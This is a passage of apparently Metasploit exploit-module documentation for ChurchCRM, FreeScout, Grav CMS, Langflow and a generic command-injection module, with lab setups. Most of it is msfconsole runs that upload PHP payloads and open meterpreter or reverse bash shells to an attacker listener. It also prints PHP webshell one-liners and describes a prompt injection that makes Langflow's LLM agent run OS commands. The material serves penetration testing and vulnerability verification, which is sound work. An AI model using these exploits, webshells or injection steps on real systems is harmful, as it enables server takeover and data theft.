msf exploit(multi/http/churchcrm_db_restore_rce) > show options
Module options (exploit/multi/http/churchcrm_db_restore_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD Password123! yes Password for the admin account
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVSSL false no Negotiate SSL/TLS for local server connections
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes Username for the admin account
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on
all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.18.0.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 PHP (In-Memory)
View the full module info with the info, or info -d command.
msf exploit(multi/http/churchcrm_db_restore_rce) > check
[*] Found ChurchCRM version: 6.0.2
[*] 127.0.0.1:80 - The target appears to be vulnerable. Vulnerable version 6.0.2 detected via CRM-VERSION header.
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Getting the session cookie
[+] The session cookie has been received
[*] Uploading the file : .htaccess
[+] The file have been uploaded successfully
[*] Uploading the file : LQyZQTSxhC.php
[+] The file have been uploaded successfully
[*] Trying to execute the payload
[*] Sending stage (42137 bytes) to 172.18.0.2
[+] Deleted .htaccess
[+] Deleted LQyZQTSxhC.php
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:33138) at 2026-03-06 09:49:16 +0100
[+] Payload successfully executed
meterpreter > getpid
Current pid: 224
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : c03035cd436a
OS : Linux c03035cd436a 6.18.13-arch1-1 #1 SMP PREEMPT_DYNAMIC Wed, 25 Feb 2026 23:12:35 +0000 x86_64
Architecture : x64
System Language : C
Meterpreter : php/linux
meterpreter >
```
### PHP (Fetch) target : ChurchCRM 6.1.0 on Ubuntu 22.04 LTS (Docker Image)
```bash
msf > use exploit/multi/http/churchcrm_db_restore_rce
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set target 2
target => 2
msf exploit(multi/http/churchcrm_db_restore_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set USERNAME admin
USERNAME => admin
msf exploit(multi/http/churchcrm_db_restore_rce) > set PASSWORD 'Password123!'
PASSWORD => Password123!
msf exploit(multi/http/churchcrm_db_restore_rce) > show options
Module options (exploit/multi/http/churchcrm_db_restore_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD Password123! yes Password for the admin account
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVSSL false no Negotiate SSL/TLS for local server connections
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes Username for the admin account
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on
all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.18.0.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PHP (fetch)
View the full module info with the info, or info -d command.
msf exploit(multi/http/churchcrm_db_restore_rce) > check
[*] Found ChurchCRM version: 6.1.0
[*] 127.0.0.1:80 - The target appears to be vulnerable. Vulnerable version 6.1.0 detected via CRM-VERSION header.
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Starting HTTP server to serve the payload...
[*] Using URL: http://172.18.0.1:8080/egTqoxbjVEOA0
[*] Getting the session cookie
[+] The session cookie has been received
[*] Uploading the file : .htaccess
[+] The file have been uploaded successfully
[*] Uploading the file : CVOdZQanyf.php
[+] The file have been uploaded successfully
[*] Trying to execute the payload
[*] Sending stage (42137 bytes) to 172.18.0.2
[+] Deleted .htaccess
[+] Deleted CVOdZQanyf.php
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:39974) at 2026-03-06 09:56:50 +0100
[+] Payload successfully executed
[*] Server stopped.
meterpreter > getpid
Current pid: 204
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 92a096dddee2
OS : Linux 92a096dddee2 6.18.13-arch1-1 #1 SMP PREEMPT_DYNAMIC Wed, 25 Feb 2026 23:12:35 +0000 x86_64
Architecture : x64
System Language : C
Meterpreter : php/linux
meterpreter >
```
@@ -0,0 +1,354 @@
## Vulnerable Application
This module exploits an unauthenticated remote code execution vulnerability in
FreeScout <= 1.8.206 (CVE-2026-28289). The `sanitizeUploadedFileName()` function
checks for dot-prefixed filenames before stripping Unicode format characters
(ZWSP U+200B), creating a TOCTOU condition that allows `.htaccess` upload via
email attachment.
The exploit sends a crafted email with a ZWSP-prefixed `.htaccess` attachment
to a FreeScout mailbox. When FreeScout fetches the email via IMAP/POP3 polling,
the ZWSP is stripped and the file is stored as `.htaccess`. The file uses
Apache's `SetHandler` directive to make itself executable as PHP.
### Docker Setup
```bash
mkdir freescout-lab && cd freescout-lab
```
Create `mailpit-auth.txt`:
```
support@freescout.local:password
```
Create `docker-compose.yml`:
```yaml
services:
app:
build:
context: .
args:
FREESCOUT_VERSION: "1.8.206"
container_name: freescout-lab
ports:
- "8889:80"
depends_on:
db:
condition: service_healthy
mail:
condition: service_started
db:
image: mariadb:10.11
container_name: freescout-db
environment:
MYSQL_DATABASE: freescout
MYSQL_USER: freescout
MYSQL_PASSWORD: freescout
MYSQL_ROOT_PASSWORD: root
healthcheck:
test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
interval: 5s
timeout: 3s
retries: 10
mail:
image: axllent/mailpit:latest
container_name: freescout-mail
ports:
- "8025:8025"
- "1026:1025"
volumes:
- ./mailpit-auth.txt:/auth.txt:ro
environment:
MP_SMTP_AUTH_ACCEPT_ANY: 1
MP_SMTP_AUTH_ALLOW_INSECURE: 1
MP_POP3_AUTH_FILE: /auth.txt
```
Create `Dockerfile`:
```dockerfile
FROM php:8.1-apache
ARG FREESCOUT_VERSION=1.8.206
RUN apt-get update && apt-get install -y \
libpng-dev libjpeg-dev libfreetype6-dev libzip-dev libicu-dev \
libxml2-dev libonig-dev unzip git curl default-mysql-client cron \
&& docker-php-ext-configure gd --with-freetype --with-jpeg \
&& docker-php-ext-install gd zip intl mbstring xml pdo pdo_mysql bcmath iconv \
&& a2enmod rewrite \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /tmp
RUN rm -rf /var/www/html && git clone --depth 1 --branch ${FREESCOUT_VERSION} \
https://github.com/freescout-helpdesk/freescout.git /var/www/html
WORKDIR /var/www/html
RUN chown -R www-data:www-data /var/www/html \
&& chmod -R 755 /var/www/html/storage /var/www/html/bootstrap/cache
RUN sed -i 's/AllowOverride None/AllowOverride All/g' /etc/apache2/apache2.conf
ENV APACHE_DOCUMENT_ROOT=/var/www/html/public
RUN sed -ri 's!/var/www/html!${APACHE_DOCUMENT_ROOT}!g' /etc/apache2/sites-available/*.conf
COPY docker-entrypoint.sh /usr/local/bin/
RUN chmod +x /usr/local/bin/docker-entrypoint.sh
ENTRYPOINT ["docker-entrypoint.sh"]
CMD ["apache2-foreground"]
```
Create `docker-entrypoint.sh`:
```bash
#!/bin/bash
set -e
echo "[*] Waiting for MySQL..."
until php -r "new PDO('mysql:host=db;dbname=freescout', 'freescout', 'freescout');" 2>/dev/null; do
sleep 2
done
if [ ! -f /var/www/html/.env ]; then
echo "[*] Creating .env..."
cat > /var/www/html/.env << 'EOF'
APP_URL=http://localhost:8889
APP_KEY=base64:RDsOPJLEGKDP8BPkWmgbAgDrT3VGhns1MiCPSKGBpMo=
DB_CONNECTION=mysql
DB_HOST=db
DB_PORT=3306
DB_DATABASE=freescout
DB_USERNAME=freescout
DB_PASSWORD=freescout
APP_DEBUG=true
EOF
chown www-data:www-data /var/www/html/.env
fi
echo "[*] Running migrations..."
cd /var/www/html
php artisan migrate --force --seed 2>/dev/null || php artisan migrate --force
echo "[*] Creating storage link..."
rm -f /var/www/html/public/storage
ln -s /var/www/html/storage/app /var/www/html/public/storage
echo "[*] Creating admin user and mailbox..."
php -r "
require '/var/www/html/vendor/autoload.php';
\$app = require_once '/var/www/html/bootstrap/app.php';
\$kernel = \$app->make(Illuminate\Contracts\Console\Kernel::class);
\$kernel->bootstrap();
\$u = App\User::firstOrNew(['email' => 'admin@freescout.local']);
\$u->fill([
'first_name' => 'Admin',
'last_name' => 'User',
'password' => bcrypt('admin123'),
'role' => App\User::ROLE_ADMIN,
'status' => App\User::STATUS_ACTIVE,
]);
\$u->save();
echo \"[+] Admin user ready\n\";
\$m = App\Mailbox::firstOrNew(['email' => 'support@freescout.local']);
\$m->name = 'Support';
\$m->email = 'support@freescout.local';
\$m->in_server = 'mail';
\$m->in_port = 1110;
\$m->in_protocol = 2;
\$m->in_encryption = 1;
\$m->in_username = 'support@freescout.local';
\$m->in_password = 'password';
\$m->in_validate_cert = 0;
\$m->ticket_status = 1;
\$m->ticket_assignee = 1;
\$m->out_method = 3;
\$m->out_server = 'mail';
\$m->out_port = 1025;
\$m->out_username = '';
\$m->out_password = '';
\$m->out_encryption = 1;
\$m->save();
try {
\$m->users()->syncWithoutDetaching([\$u->id]);
} catch (Exception \$e) {}
echo \"[+] Mailbox ready: support@freescout.local (POP3 from mail:1110)\n\";
"
php artisan freescout:clear-cache 2>/dev/null || true
chown -R www-data:www-data /var/www/html/storage
echo "* * * * * www-data /usr/local/bin/php /var/www/html/artisan schedule:run >> /dev/null 2>&1" > /etc/cron.d/freescout
chmod 0644 /etc/cron.d/freescout
service cron start
echo "[+] FreeScout lab ready at http://localhost:8889"
echo "[+] Mailpit UI at http://localhost:8025"
echo "[+] SMTP: localhost:1026 | POP3: mail:1110"
echo "[+] Mailbox: support@freescout.local"
exec "$@"
```
```bash
chmod +x docker-entrypoint.sh
docker compose up -d
```
Wait about 60 seconds for migrations, admin user creation, and mailbox setup.
## Verification Steps
1. Start `msfconsole`
2. `use exploit/multi/http/freescout_htaccess_rce`
3. `set RHOST 127.0.0.1` (SMTP server)
4. `set RPORT 1026` (SMTP port)
5. `set HTTPHOST 127.0.0.1` (FreeScout web server)
6. `set HTTPPORT 8889` (FreeScout web port)
7. `set MAILTO support@freescout.local`
8. `set LHOST <your-ip>`
9. `check` - verify it returns `Detected`
10. `run` - verify a session opens (may take up to 60s for email fetch)
## Options
### MAILTO
The FreeScout mailbox email address to send the exploit email to. This must be
a valid, configured mailbox in the target FreeScout instance.
### RHOST / RPORT
The SMTP server and port used to deliver the exploit email. These come from the
SMTPDeliver mixin (note: singular `RHOST`, not `RHOSTS`). This can be the
target's own MX server, or any relay that delivers to the mailbox.
### HTTPHOST / HTTPPORT
The FreeScout web server address and port. Used for the check method and to find
the uploaded shell. Separate from RHOST because the SMTP and HTTP targets may
be different hosts. Set `SSL true` for HTTPS targets. The module reads the
server `Date` header to calculate when the next cron cycle will fetch the email.
### FETCH_WAIT (Advanced)
Seconds to wait for the cron fetch cycle. Default is `60` (FreeScout polls every
minute). The module uses the server `Date` header to calculate the exact wait
time; this value is the fallback when the header is absent.
### DIR_COUNTER (Advanced)
Max attachment counter per directory to scan. Default is `3`. On production
instances with many conversations per mailbox, attachments may have higher
counter values. Increase this if the module fails to find the shell.
## Scenarios
### FreeScout 1.8.206 - PHP Meterpreter (Target 0)
```
msf6 > use exploit/multi/http/freescout_htaccess_rce
msf6 exploit(multi/http/freescout_htaccess_rce) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/freescout_htaccess_rce) > set RPORT 1026
RPORT => 1026
msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPHOST 127.0.0.1
HTTPHOST => 127.0.0.1
msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPPORT 8889
HTTPPORT => 8889
msf6 exploit(multi/http/freescout_htaccess_rce) > set MAILTO support@freescout.local
MAILTO => support@freescout.local
msf6 exploit(multi/http/freescout_htaccess_rce) > set LHOST 192.168.192.1
LHOST => 192.168.192.1
msf6 exploit(multi/http/freescout_htaccess_rce) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/freescout_htaccess_rce) > run
[*] Started reverse TCP handler on 192.168.192.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. FreeScout detected. Version cannot be determined remotely.
[*] Sending exploit email to support@freescout.local via 127.0.0.1:1026
[+] Exploit email sent
[*] Waiting 15s for next cron fetch cycle...
[+] Shell at /storage/attachment/5/1/1/.htaccess
[*] Sending stage (42137 bytes) to 192.168.192.4
[*] Meterpreter session 1 opened (192.168.192.1:4444 -> 192.168.192.4:50250) at 2026-03-05 17:37:11 +0100
meterpreter >
```
### FreeScout 1.8.206 - Reverse Bash Shell (Target 1)
```
msf6 > use exploit/multi/http/freescout_htaccess_rce
msf6 exploit(multi/http/freescout_htaccess_rce) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/freescout_htaccess_rce) > set RPORT 1026
RPORT => 1026
msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPHOST 127.0.0.1
HTTPHOST => 127.0.0.1
msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPPORT 8889
HTTPPORT => 8889
msf6 exploit(multi/http/freescout_htaccess_rce) > set MAILTO support@freescout.local
MAILTO => support@freescout.local
msf6 exploit(multi/http/freescout_htaccess_rce) > set LHOST 192.168.192.1
LHOST => 192.168.192.1
msf6 exploit(multi/http/freescout_htaccess_rce) > set TARGET 1
TARGET => 1
msf6 exploit(multi/http/freescout_htaccess_rce) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(multi/http/freescout_htaccess_rce) > run
[*] Started reverse TCP handler on 192.168.192.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. FreeScout detected. Version cannot be determined remotely.
[*] Sending exploit email to support@freescout.local via 127.0.0.1:1026
[+] Exploit email sent
[*] Waiting 13s for next cron fetch cycle...
[+] Shell at /storage/attachment/9/3/1/.htaccess
[*] Command shell session 2 opened (192.168.192.1:4444 -> 192.168.192.4:41830) at 2026-03-05 17:42:35 +0100
sh-5.2$
```
### FreeScout 1.8.206 - Linux Dropper Meterpreter (Target 2)
```
msf6 > use exploit/multi/http/freescout_htaccess_rce
msf6 exploit(multi/http/freescout_htaccess_rce) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/freescout_htaccess_rce) > set RPORT 1026
RPORT => 1026
msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPHOST 127.0.0.1
HTTPHOST => 127.0.0.1
msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPPORT 8889
HTTPPORT => 8889
msf6 exploit(multi/http/freescout_htaccess_rce) > set MAILTO support@freescout.local
MAILTO => support@freescout.local
msf6 exploit(multi/http/freescout_htaccess_rce) > set LHOST 192.168.192.1
LHOST => 192.168.192.1
msf6 exploit(multi/http/freescout_htaccess_rce) > set TARGET 2
TARGET => 2
msf6 exploit(multi/http/freescout_htaccess_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/freescout_htaccess_rce) > run
[*] Started reverse TCP handler on 192.168.192.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. FreeScout detected. Version cannot be determined remotely.
[*] Sending exploit email to support@freescout.local via 127.0.0.1:1026
[+] Exploit email sent
[*] Waiting 24s for next cron fetch cycle...
[+] Shell at /storage/attachment/7/4/1/.htaccess
[*] Command Stager progress - 100.00% done (817/817 bytes)
[*] Meterpreter session 3 opened (192.168.192.1:4444 -> 192.168.192.4:52100) at 2026-03-05 17:48:02 +0100
meterpreter >
```
@@ -0,0 +1,132 @@
## Vulnerable Application
Grav is a modern, open source flat-file content management system (CMS) built on PHP.
It uses a file-based architecture instead of a traditional database, storing content and configuration directly on disk.
This module exploits an authenticated Remote Code Execution vulnerability
in Grav CMS via the Admin panels Direct Install plugin functionality,
allowing arbitrary PHP execution.
An authenticated administrative user can upload a crafted plugin ZIP archive containing arbitrary PHP code.
Upon installation, the archive is extracted into the following directory:
```sh
user/plugins/<plugin_name>plugin/<plugin_name>plugin.php
```
Grav automatically loads plugin PHP files during initialization.
As a result, the malicious PHP file is executed in the context of the web server user
(typically `www-data`), leading to remote code execution.
No additional sandboxing or content validation is applied to plugin PHP files during the Direct Install workflow,
making this functionality inherently dangerous when access control boundaries are crossed.
## Affected Versions
**Vulnerable:** Grav CMS `1.1.x` -> `1.7.x` versions / Admin Plugin `v1.2.x` -> `v1.10.x`
**Tested:** Grav CMS v1.7.48, v1.7.49.5 / Admin Plugin v1.10.48, v1.10.49.3
### Installation
Official website:
https://getgrav.org/
Direct download archive (example version tested):
https://github.com/getgrav/grav/releases/tag/1.7.48
1. Install dependencies:
```sh
sudo apt update
sudo apt install apache2 php php-cli php-zip php-curl unzip -y
```
2. Download Grav:
``` sh
wget https://github.com/getgrav/grav/releases/download/1.7.48/grav-admin-v1.7.48.zip
unzip grav-admin-v1.7.48.zip
sudo mv grav-admin /var/www/html/grav
sudo chown -R www-data:www-data /var/www/html/grav
```
3. Visit the below and create an administrative user during setup.
```sh
http://<target>/grav/admin
```
4. Ensure:
- Admin plugin is enabled
- Direct Install functionality is available
## Verification Steps
1. Install Grav CMS with Admin plugin enabled as mentioned above.
2. Create an administrative user.
3. Start `msfconsole`.
4. Do: `use exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286`
5. Do: `set RHOSTS [target]`
6. Do: `set RPORT [Port]`
7. Do: `set USERNAME [username]`
8. Do: `set PASSWORD [password]`
9. Do: `check`
10. You should see the target is vulnerable
## Options
### USERNAME
Valid administrative username. `Required.`
### PASSWORD
Valid administrative password. `Required.`
## Scenarios
### Version Tested
Grav CMS: 1.7.48/1.7.49.5
Admin Plugin: 1.10.48/1.10.49.3
PHP: 8.1
Web Server: Apache 2.4
### Example: Exploiting Grav CMS v1.7.48 to get Meterpreter
```msf6
msf6 > use exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286
msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set rhosts 192.168.1.12
rhosts => 192.168.1.12
msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set rport 8080
rport => 8080
msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set username x1o3
username => x1o3
msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set password Real_Pass123
password => Real_Pass123
msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
- Grav CMS 1.7.49.5 is vulnerable
- Admin Plugin v1.10.49.3 is vulnerable
[*] Authenticating to Grav admin...
[*] Authenticating...
[+] Already authenticated
[*] Uploading plugin via Direct Install...
[*] Sending stage (40004 bytes) to 172.18.0.2
[*] Cleaning up plugin directory: user/plugins/g02omdfkh89ki8zruwplugin
[+] Plugin directory removed
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.18.0.2:52520) at 2026-03-27 11:42:25 +0530
meterpreter > shell
Process 25 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
---
@@ -0,0 +1,186 @@
## Vulnerable Application
The CSV Agent node in Langflow hardcodes allow_dangerous_code=True,
which automatically exposes LangChains Python REPL tool (python_repl_ast).
As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection,
leading to full Remote Code Execution (RCE).
The vulnerability affects:
* Langflow < 1.8.0
This module was successfully tested on:
* Langflow 1.7.3 installed with Docker
### Installation
1. `git clone https://github.com/langflow-ai/langflow.git`
2. `git checkout 1.7.3`
3. `cd langflow/docker_example`
4. `Edit docker-compose.yml`
```
services:
langflow:
- image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
- pull_policy: always # set to 'always' when using 'latest' image
+ # image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
+ image: langflowai/langflow:1.7.3 # or another version tag on https://hub.docker.com/r/langflowai/langflow
+ # pull_policy: always # set to 'always' when using 'latest' image
ports:
- "7860:7860"
depends_on:
@@ -11,7 +12,7 @@ services:
# This variable defines where the logs, file storage, monitor data and secret keys are stored.
- LANGFLOW_CONFIG_DIR=/app/langflow
volumes:
- - langflow-data:/app/langflow
+ - langflow-data:/app
postgres:
image: postgres:16
```
5. `docker compose up`
6. `On an attacker machine`
```
curl -fsSL https://ollama.com/install.sh | sh
ollama run llama3.1
```
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_rce_cve_2026_27966`
4. Do: `run lhost=<lhost> rhost=<rhost> ollamaapiuri=<ollamaapiuri> apikey=<apikey> model=<model>`
5. You should get a meterpreter
## Options
### APIKEY (required)
Langflow API key to interact with Langflow.
### OLLAMAAPIURI (required)
Endpoint of the OLLAMA API controlled by an attacker.
### MODEL (required)
Valid ollama model name.
## Scenarios
### cmd/linux/http/x64/meterpreter_reverse_tcp
```
msf > use exploit/multi/http/langflow_rce_cve_2026_27966
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/langflow_rce_cve_2026_27966) > options
Module options (exploit/multi/http/langflow_rce_cve_2026_27966):
Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY yes Langflow API key to interact with Langflow.
MODEL yes Valid ollama model name.
OLLAMAAPIURI yes Endpoint of the OLLAMA API controlled by an attacker.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5h, sapni, socks4, socks5, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 7860 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE true yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac
cepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME yVhDYYwMmZm no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payl
oad=cmd/linux/http/x64/meterpreter_reverse_tcp target=Linux\ Command
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
[*] Project: 367f399f-6f17-43a2-bea0-33183baae731
[*] Flow: 42098574-2343-4b8a-97fe-0e2800270087
[*] Job: 014b3154-e882-4649-9c16-5f25e4c358d9
[*] Waiting...
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:59440) at 2026-04-18 12:31:49 +0900
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : d513d5e46402
OS : Debian 13.3 (Linux 6.8.0-56-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### python/meterpreter/reverse_tcp
```
msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payload=python/meterpreter/reverse_tcp target=Python\ payload
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
[*] Project: 146bfdff-95cc-4e43-b0f2-dbdaa6916401
[*] Flow: 497484a7-6f39-4418-8113-aba0c2f57a3b
[*] Job: 0e4282ad-bf9d-4079-891b-81a2ccb8dbe8
[*] Waiting...
[*] Sending stage (23404 bytes) to 192.168.56.16
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:47988) at 2026-04-18 12:48:07 +0900
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : d513d5e46402
OS : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
Architecture : x64
System Language : C
Meterpreter : python/linux
meterpreter >
```
@@ -0,0 +1,266 @@
## Vulnerable Application
This module is for any generic HTTP command execution where user-supplied input is directly passed to system execution functions via a HTTP request.
As a result, able to use:
- Any web command execution vulnerability _(think hardware devices having ping/traceroute functions)_
- Any lab target, which have a "command execution" module.
- Such as [DVWA](https://github.com/digininja/DVWA) or [Mutillidae](https://github.com/webpwnized/mutillidae)
- Included with [Metasploitable](https://docs.rapid7.com/metasploit/metasploitable-2/)
- Alternatively, simulate with one of the following PHP code snippets (for a basic webshell):
- `<?php system($_REQUEST["cmd"]); ?>`
- `<?php passthru($_REQUEST["cmd"]); ?>`
- `<?php echo exec($_REQUEST["cmd"]); ?>`
- `<?php echo shell_exec($_REQUEST["cmd"]); ?>`
- `<?php echo fread(popen($_REQUEST["cmd"], "r"), 2096); ?>`
- ```<?php echo `{$_REQUEST["cmd"]}`; ?>```
This is similar to `exploits/unix/webapp/php_eval`, except it isn't limited to PHPs code execution, but can use any OS command execution function.
- - -
Setting up a quick PHP test lab on a Debian-base host:
```console
$ sudo apt-get install --yes apache2 php curl
[...]
$
$ sudo systemctl start apache2
$
$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/html/shell.php
<?php system($_REQUEST["cmd"]); ?>
$
$ curl localhost/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
```
## Verification Steps
1. Setup lab, or find a web command execution vulnerability
1. Start `msfconsole`
1. Do: `use exploits/multi/http/os_cmd_exec`
1. Do: Set `RHOSTS` and `URIPATH` (`HEADERS` and `POSTDATA` are optional, depending on vulnerability). May also want to customize the payload and `LHOST` if desired
1. Do: `run`
1. You should get a shell
## Options
### `HEADERS`
Any additional HTTP headers to send, cookies for example. Format: `header:value,header2:value2`.
### `POSTDATA`
Any HTTP POST method request data to send, with the command injection placeholder set to `!INJECT!`.
If this value is blank, will be a HTTP GET method request.
### `Proxies`
A proxy chain of format: `type:host:port[,type:host:port][...]`.
Supported proxies: `sapni`, `socks4`, `socks5`, `socks5h`, `http`
### `RHOSTS`
The target host(s), see: https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
### `RPORT`
The target port (TCP).
Default: `80`
### `SSL`
Negotiate SSL/TLS for outgoing connections.
Default: `false`
### `URIPATH`
The URI to request, with the command injection placeholder set to `!INJECT!`.
Default: `/ping/?cmd=!INJECT!`
### `VHOST`
HTTP server virtual host.
## Scenarios
### Example PHP Lab
```console
msfadmin@metasploitable:~$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/shell.php
<?php system($_REQUEST["cmd"]); ?>
msfadmin@metasploitable:~$ curl localhost/shell.php?cmd=id
